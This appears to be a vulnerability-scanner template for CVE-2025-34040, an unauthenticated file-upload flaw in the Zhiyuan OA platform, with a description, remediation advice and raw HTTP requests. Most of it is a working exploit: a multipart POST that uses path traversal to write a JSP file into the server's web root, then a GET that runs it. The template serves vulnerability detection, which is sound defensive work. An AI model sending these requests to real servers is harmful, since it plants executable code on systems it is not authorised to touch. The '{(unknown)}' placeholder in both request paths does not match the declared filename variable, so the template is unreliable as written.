id: CVE-2025-34040

info:
  name: Zhiyuan OA Platform - Arbitrary File Upload
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
  impact: |
    Unauthenticated attackers can upload malicious JSP files through path traversal in the wpsAssistServlet interface, achieving remote code execution on the Zhiyuan OA server.
  remediation: |
    Upgrade to Zhiyuan OA platform version 8.0sp3 or later, which properly validates file upload paths and file types.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-34040
    - https://www.cnblogs.com/pursue-security/p/17677130.html
  classification:
    epss-score: 0.09679
    epss-percentile: 0.93111
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="seeyon/index.jsp"
  tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln

variables:
  marker: "{{randstr}}"
  filename: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{(unknown)}.jsp&fileId=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip

        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="123.xls"
        Content-Type: application/vnd.ms-excel

        <%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
        --59229605f98b8cf290a7b8908b34616b--

    matchers:
      - type: word
        part: body
        words:
          - "officeTransResultFlag"
          - '"success":true'
        condition: and
        internal: true

  - raw:
      - |
        GET /{(unknown)}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"
# digest: 4b0a00483046022100c114291cdd621a122f32d2d0a86a1c72ae1286c471bbb80f14da92d6ab8acdec022100bad7f9390594d6ba65b63e8d20cc3b9d787e9e9f7944c2dc681ce2d75cc52ecb:922c64590222798bb761d5b6d8e72950